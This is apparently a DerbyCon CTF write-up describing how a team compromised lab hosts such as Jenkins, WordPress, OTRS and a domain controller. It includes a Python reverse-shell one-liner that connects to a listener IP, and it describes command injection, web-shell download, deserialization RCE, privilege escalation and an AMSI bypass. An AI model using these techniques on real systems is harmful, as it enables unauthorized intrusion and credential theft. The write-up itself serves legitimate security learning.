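The script amounted to something like this (a reconstruction rather than the exact code we used, assuming the encoded bytes have been dumped to a file):

data = open("flag.txt.enc", "rb").read()  # encoded bytes extracted from the filesystem image
for start_key in range(256):
    key, out = start_key, bytearray()
    for byte in data:
        out.append(byte ^ key)
        key = (key + 0x07) & 0xFF         # the key rotates by 0x07 for every byte
    if b"@" in out and out.isascii():     # crude filter for a plausible email address
        print(start_key, bytes(out))

The flag file contents we recovered were: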

  • superkai64@minecraft.net

Jenkins

There were two services available: SSH and a web server.

Browsing to the website on port 8080 presented a Jenkins portal that allowed for self-registration.

Jenkins is open source software, written in Java, that has a well-known exploitation path via the Script Console. As described on the Jenkins web site: “Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents.” While Jenkins now offers protections to limit access by non-administrators, the installed version did not offer those protections.

We registered for an account, which allowed for access to the “Manage Jenkins” features and the Script Console.

We then used one of the reverse shells belonging to pentestmonkey:
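The cheat sheet’s Python variant, for reference (the listener IP address and port are placeholders, and this may not be the exact variant we ran):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'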

It was possible to gain a reverse shell running in the context of the user Jenkins on this system.

From that shell, it was possible to gain a full TTY session by using the python3 installation on the host. This allowed access to a few of the five flags on this host.
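The usual way to do that is the standard pty one-liner:

python3 -c 'import pty; pty.spawn("/bin/bash")'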

Access to a root shell was gained by breaking out of the less program. Within the sudoers file, the Jenkins user was defined as having the ability to run less against the syslog file without requiring a password. Once a root shell was obtained, the CTF user’s password was recovered from the .bash_history file. This user was defined within the sudoers file as having full root permissions, and that account allowed us to use the SSH service directly, bypassing Jenkins and gaining the rest of the flags on the host.

osCommerce

We discovered that default installation pages for the osCommerce application were accessible.

This was particularly interesting as publicly available exploits exist, which can be executed by an unauthenticated user, resulting in code execution on the underlying server.

Our actions were fairly limited because we were executing commands in the context of the www-data user. As such, the next step was to compile, upload and execute a kernel-based privilege escalation exploit (CVE-2016-4557) for more meaningful access.

Executing the exploit provided us with a root shell, and the ability to read files without restriction.

After scooping up most of the file-based flags, the next step was to compromise the MySQL database of the application. We found credentials for the debian-sys-maint user and used these to log into the MySQL database.

Displaying the contents of the administrators table provided us with access to the final flag on osCommerce.

Quiz System

Based on the directory structure, file names and application name, we were relatively confident that the source code of Quiz System was publicly available at this link:

After downloading the application, we began to search for SQL injection vulnerabilities which would result in access to the underlying system.

The /admin/ajx-addcategory.php file had a parameter called catname which was vulnerable to SQL injection attacks.

We created the following requests file and fed this into sqlmap. This resulted in code execution on the underlying server in the context of the www-data user.

Sqlmap creates an upload file when the --os-shell flag is used. This was particularly useful, as it allowed us to upload a PHP payload which provided us with a shell on the underlying system.

After inspecting the /etc/passwd file, we identified that there were two users of interest, quiz and root. Both users shared the same password, which we luckily guessed, obtaining root access and all of the file-based flags.

WordPress

Facepalm update: The DerbyCon CTF team got in touch with us and let us know that while the attack path described here is valid, it was not the intended path. Apparently there was a WordPress username – djohnston – embedded in the HTML comments somewhere, and that user had a password of Password1 for wp-admin. Certain members of our team maintain they attempted this with no success but… *cough* 🙂

This challenge included a WordPress based blog – the EquiHax Blog.

There was an XXE flaw which allowed us to view the contents of server-status because it was available to localhost.  Through that, we found a file named dir.txt which was accessible under the wp-admin directory. This file provided a listing of all files in this directory.

Interestingly, the 050416_backup.php file was originally intended to be named pingtest.php.

The purpose of this file was to feed an IP or domain argument, via the host parameter, into /bin/ping. As this file executed system commands, we were able to add a semi-colon to terminate the ping command and issue commands of our choice. Consequently, we spun up a temporary web server and hosted a password-protected web shell, which was then downloaded to the WordPress server using wget.

Having a web shell allowed us to execute further commands, as well as upload and download files. We leveraged the existing python3 interpreter on the WordPress box to obtain a reverse TCP shell in the context of the www-data user. After inspecting the groups for this user, we identified that www-data was part of the sudo group, which enabled us to easily escalate our privileges to root.

After scooping up most of the file-based flags, the next step was to compromise the application’s MySQL database. Credentials for accessing the database were located in the wp-config.php file. Displaying the contents of the administrators table provided us with access to the final flag on WordPress.

Equihax Chat Server

This server hosted two applications: a dd-wrt firewall on port 80 and a custom chat application on port 443. The information presented by the dd-wrt firewall implied that this host bridged the two networks in scope together.

It also had an RDP service available, even though the dd-wrt application implied it was a Linux box.

It was our assumption that the HTTPS and RDP ports were being reverse proxied from host(s) within the second network, but we ran out of time and could not confirm this.

Returning to the custom application, we had the option of logging in using either IdentETC or IdentLDAP. This seemed like a bit of a hint that the application was able to use the credentials from an enterprise authentication system. It might be connected to something bigger.

We guessed the weak credentials and were able to log in (chat/chat) with the IdentETC method.

Once logged in, we found a simple chat interface where you could post a message and subscribe/unsubscribe from the Public channel.

We then identified an interesting looking session cookie. When you first entered your credentials using the IdentETC method, these were POSTed to the /Login page. This set a cookie called session, and then a redirect to /Chat was triggered. By examining the session cookie, we could see that it was made up of a number of parts, all delimited by a colon.

We decoded the session cookies value and obtained the following output.

That was interesting; even though we were using the IdentETC method of authentication, it was actually using the IdentLDAP method behind the scenes to log us in.

Remember the RDP that was open? Well, guess which credentials worked on that!

It quickly became apparent that we were not the only people with these credentials as we were being kicked out from our RDP session on a very regular basis. To ensure we maintained access, we dropped C2 and started to enumerate the machine and the domain.

We noticed that one of the other users to have logged into the device was scott; it turned out that account was part of the domain admins group.

Further investigation also confirmed that this device was located on a network segment inaccessible from the rest of the network (192.168.252.0/24 instead of 192.168.253.0/24).

It was then possible to use our access to this machine to begin to explore the “internal” network range and to begin attacking the domain. After a while (actually a disappointingly long time) we discovered that scott was using his username as a password.

We could then use scott’s credentials and the foothold we’d gained on the chat server to pivot to the domain controller and start hunting for flags. One of the things we did was dump the hashes pulled from the domain controller and feed them into our hash cracking machine.

Within a few minutes we had retrieved 1,372 passwords. We picked one of the passwords at random and submitted it; 2 points.

We therefore likely had a load of low value flags that needed to be submitted, but being the lazy hackers we are, no one was really in the mood to submit 1,372 flags manually; automation to the rescue! We quickly put together a Python script to submit the flags on our behalf, and got back to hacking while the points slowly trickled in.
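The script was nothing sophisticated; something along these lines, with a made-up scoreboard URL and form field, since we no longer have the real ones to hand:

import requests

SUBMIT_URL = "https://scoreboard.example/submitflag"  # placeholder

session = requests.Session()
with open("cracked_passwords.txt") as f:
    for flag in (line.strip() for line in f):
        if flag:
            response = session.post(SUBMIT_URL, data={"flag": flag})  # field name assumed
            print(flag, response.status_code)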

Chat Server Continued…

What was completely conspicuous by its absence was any form of integrity checking on the session cookie (this should have been implemented through the use of a MAC, utilising some form of strong server side secret).

We could see that the cookie was the serialized form of a binary object. When the cookie was sent to the server, it was likely deserialized back into a graph of binary objects. The serialized form defines the objects to be instantiated and the values to be copied into them. You can’t send the declaration of an object; only its data. This doesn’t mean it isn’t possible to build a graph that will execute code, though.

A fantastic example of this is Gabriel Lawrence and Chris Frohoff’s ysoserial tool for Java. To understand this concept further, we can’t recommend their talk “Marshalling Pickles” enough:

Ruby on Rails has gadgets for RCE via deserialization through ActiveSupport, which we tried, but unfortunately this was not a Rails application. Then…

It didn’t appear to be a User object, though.

Well, it just happened to be assigned in a different location. Once you had logged in the redirect to /Chat caused a second part of the cookie to be set.

As we can see here, and comparing to the previous session cookie screenshot, the section of the session cookie before the first delimiter had dramatically increased.

The serialized object now contained a Userid and indentToken. Doing some research, we found that these classes are part of the SHIPS (https://github.com/trustedsec/SHIPS) toolkit that TrustedSec has put on GitHub.

One of the gems inside this project is called usa. It contains the definitions for IdentLDAP and IdentETC, along with a very interesting definition called IdentETCNoPass. Despite a bit of time spent on authenticating with that object, no shell was forthcoming – time for a break.

The break involved learning as much as possible about Ruby, looking at some of the other challenges and watching the Offspring, who were awesome.

Coming back to this and thinking about the clue from earlier, it was time to try to mock a Ruby object, serialize it and see what happened. To do this we needed a Ruby environment, and for that we used https://repl.it – essentially an online code testing environment.

With Ruby serialization, only the name of the object has to match during deserialization; any matching members will be populated with the values passed through. Here we were able to mock the User object completely, then serialize it and encode it in Base64. The payload in both the indentType and identToken here was a string that should execute the ping command:

https://stackoverflow.com/questions/6338908/ruby-difference-between-exec-system-and-x-or-backticks

Here is the serialized and encoded form.

And here are the pings coming back after sending the cookie in:

So where is the flag? Well, unfortunately we only worked this out with 15 minutes of the CTF to go, so despite gaining code execution the flag eluded us. Ah well, it was still a really cool challenge that we had some epic learning from.

OTRS

Having used the Equihax Chat Server to compromise the domain controller and pivot into the internal network, we were faced with some new machines. This was one of them.

In order to find OTRS, we ran various reconnaissance tools post-foothold against the internal network of equihax.com. The first was an ARP scan of the network, as shown below, which identified two additional hosts, 192.168.252.10 and 192.168.252.106:

192.168.252.10 was on the inside of the dd-wrt host, which was later revealed not to be exploitable.

After we compromised both Windows hosts within the internal network, we performed a portscan to find out if any additional ports were open from the domain controller. However, it appeared that all ports were available to both hosts on the network.

It was noted that the more stable host was the DC, and as such we deployed a SOCKS proxy server on the domain controller (192.168.252.2). The SOCKS proxy allowed us to build a tunnel through the compromised host and funnel traffic from our own hosts into the target environment. This allowed us to access a number of resources, including remote desktop (RDP) sessions and internal web sites such as OTRS.

The following screenshot shows the homepage of the OTRS software which was identified using lateral movement techniques from the internal domain controller.

After some additional reconnaissance, it was identified that this software was used as an aid to helpdesk staff for raising tickets internally. Clicking the link shown below led to a login prompt, which was found to have the easily guessable credentials helpdesk/helpdesk.

Once connected to the OTRS software as a standard user, the following ticket information was available.


After looking inside the tickets, the following hint was given:

“Hey Jim I am still working on getting this helpdesk app setup since management insists we actually have to take care of the darn users now.

I know the password I set was Swordfish but I can’t remember what the administrator account name was. Anyway now that this thing is stood up we might as well use it”

Swordfish was both the password for an administrator level account on this software as well as a flag. We had to identify the default account for this host and found this by doing some research on the Internet. This was root@localhost.


We discovered from conducting research against this software (OTRS 6.0.1) that two publicly disclosed vulnerabilities exist for it. One abuses the package manager by uploading a new package, achieving code execution, and the other abuses the PGP keys feature, which can also achieve code execution.

Only one of the two appeared to work in this environment (CVE-2017-16921), which affected the PGP key deployment. More information on these vulnerabilities can be found here:

The essence of the vulnerability was editing the PGP::Bin file and parameters to execute some other binary; in this example we used a simple Python reverse TCP connection.


The payload used was:

Once we had a foothold on the host, we identified it was running as the apache user and privilege escalation was required. The usual escalation techniques were attempted and a SetUID binary that seemed out of place was identified.

Using the foothold, we executed the following commands to extract the hashes:

The -O flag writes the contents of the archive to the screen. However, this didn’t directly yield a flag, or at least not until the root password could be cracked, which we didn’t complete before the end of the CTF. It did, however, reveal that the user’s password for OTRS was OTRS.


To obtain a full root shell and access the flag, we could have either guessed the location, tar’d the entire root folder, or replaced the /etc/shadow and /etc/passwd files to create a new UID 0 user. We got root access and used PoshC2 for handling our shells, including on this box, as shown below.

There may have been other flags on this host but we ran out of time to find them.

Web Credit Report Dispute Application

This server hosted a custom credit report dispute application. As a pre-authenticated user we were able to create a dispute, but in order to find more of the functionality, we needed to be able to log in.

Clicking on the “Create a report” link, we were taken to the “Problem Report form”. As this page was pre-authentication and there was an authenticated section to the application, we immediately started thinking this might be some kind of stored XSS or SQLi. We spent a bit of time fuzzing, which ultimately showed this not to be the case.

Okay then, let’s try and log in.

After a bit of fuzzing on the login form, it turned out that you could log in using the username:password combination of Admin:. Interesting; it looked like there was some kind of injection vulnerability in the password field. We decided we’d roll with it for the moment and see if anything more could be done with it later.

Once we were authenticated, we got to the /viewreports.php page shown below. It contained all of the reports that had been created. Thanks to fellow CTFers’ prodigious use of Burp Suite Active Scan, there were quite a few reports listed. It was also difficult to understand when one was created – something we later found a solution to.

Clicking on any of the links here took you to the /viewreport.php page again, this time detailing all the information that the relevant user had submitted.

Locating a report that we had just created was a little on the hard side; the actual report name looked like it contained some kind of timestamp, and unfortunately no ID was returned when you created a report. The solution is documented a little further down.

The rpt field was found to have a path traversal vulnerability, but by far the most interesting part of the page was the “I have fixed this!” link. Viewing the source of the page and decoding the URL using the Burp shortcut ctrl+shift+u, we could see that the rename.php page took two parameters, old & new, which just happened to take file paths as values.

Our immediate thought was to inject PHP via the create report page, locate it on the view requests page, move it so it had a PHP extension, navigate to it and BOOM code execution.

If only it was that simple; it was indeed possible to change the file extension to PHP, PHP5 and PHPS, however all the fields in the Report Creation page were being escaped on output, exactly as can be seen here with the first name field:

Okay, so how was it possible to easily spot the page that had just been created?

Well, no Spicy Weasel write-up is complete without the use of LINQPad, our favourite C# scratchpad tool (https://linqpad.net). For those interested in beginning .NET development, this is an excellent tool to experiment with.

The idea was to write a script that would retrieve the listing on the viewreports.php page, persist the current entries, and then on every subsequent run check for any new pages. To persist between runs, a static class with static container members was created. LINQPad can use a new process per run of the script, which would destroy our static container, so to ensure that the results persisted between runs, the following settings were applied (by right clicking the query and selecting properties).

Who said you can’t parse HTML with a regex? 🙂
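The same idea in Python form, for illustration; we actually used LINQPad and C#, and the URL and regex here are made up:

import re, time, requests

seen = set()
while True:
    html = requests.get("http://target/viewreports.php").text          # placeholder URL
    reports = set(re.findall(r'viewreport\.php\?rpt=([^"]+)', html))   # made-up pattern
    for report in sorted(reports - seen):
        print("new report:", report)
    seen |= reports
    time.sleep(5)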

Checking out the server header, we could see that somewhat unusually for a PHP application, it was hosted on Windows. This suddenly made the rename.php file a lot more interesting.

What if the page can read and write to UNC paths..?

So yes, it turns out UNC paths could be read. The problem, though, was that IIS was running with no network credentials, and modern SMB is designed to make it as difficult as possible to allow connections by hosts with no credentials.

By deliberately weakening the SMB configuration on a virtual machine, it was possible to have a file read successfully by sending the request in the screenshot above. This allowed the upload of a PHP file that kicked off a PowerShell PoshC2 (https://github.com/nettitude/PoshC2) one-liner, giving us a shell to go searching for the flags.

Once we identified that vulnerability in the application, we hosted a PHP file which executed PowerShell on the remote host using PoshC2.


Once we had C2 on this host, we discovered it was running as IUSR, a low privilege IIS application user. We attempted various standard privilege escalation checks against the host and concluded that it was a Server 2016 box with no trivial escalation vulnerabilities beyond missing patches. EternalBlue (MS17-010) could have been an option, but it is normally unstable against Server 2016 and was probably not the intended exploit for this host.

After further enumeration of the host we identified two more flags on the system using the command below:

This yielded:

  • info.php:2:header(‘Flag: TheBruteForceIsStrongInThisOne’);
  • viewreports.php:19:header(‘Flag: InjectionHeaders’);

We also found a file inside the adminscripts folder containing a hint that suggested it was run as a scheduled task every five minutes. We added an additional line to execute our PowerShell payload:

This allowed us to obtain administrator level privileges on the host with PoshC2, as shown below. We then extracted the hashes of all users and cracked the password for the administrator user, which was a large flag, and grabbed another flag from the administrator’s desktop.


It should be noted that all Windows 2016 hosts had Windows Defender enabled, which was blocking malicious PowerShell.

As such we needed to migrate to inject the PoshC2 shellcode, which employs the AMSI bypass released by @mattifestation:

Equihax License Validator (fu3) – Keygen Project

The Equihax licensing server had one objective – download the application and try to reverse engineer the .NET application to create a keygen to submit back to the original site for verification.

We first identified it was a .NET assembly by running the file command on Linux.

We used ILSpy to decompile the binary, but it generated the following error when trying to decompile the validateLicense function.


We then downloaded the latest version of ILSpy (4.0.0.4319-beta2), which successfully decompiled the code back to C#.


The first section of the code took the user’s first name and MD5-hashed it. It then took the first eight characters of the resulting hash string and used them in the next part of the code. It also had a static string (Kc5775cK) that was used as part of the key generation.
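In Python terms, those first steps look like this; the final combination shown is our simplified assumption, as the authoritative logic is the decompiled C# itself:

import hashlib

first_name = "Spicy"                                        # arbitrary user input
prefix = hashlib.md5(first_name.encode()).hexdigest()[:8]   # first eight characters of the hash
license_key = prefix + "Kc5775cK"                           # static string from the binary; combination assumed
print(license_key)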

Using that algorithm, we could simply build our own StringBuilder string and spit it out using LINQPad. There was also some unnecessary code below this, but we didn’t need it to generate the license. Here’s the code for this project and the generated license key.

The full source code is as follows.

This yielded the flag.

MUD

There was a downright evil box that hosted a MUD, courtesy of @Evil_Mog. With the exception of a couple of simple flags, we were unable to gain any traction here. This tweet says it all…

Conclusion

This year’s DerbyCon was as fun as ever, and we really enjoyed participating in the CTF competition. Hopefully you can find some value in us sharing portions of the competition with you.

We’re always grateful for the opportunity to practise our craft and we recognise the sheer effort required to put on an event like DerbyCon, including the annual DerbyCon CTF. Once we’ve rested up, we’ll be looking forward to next year!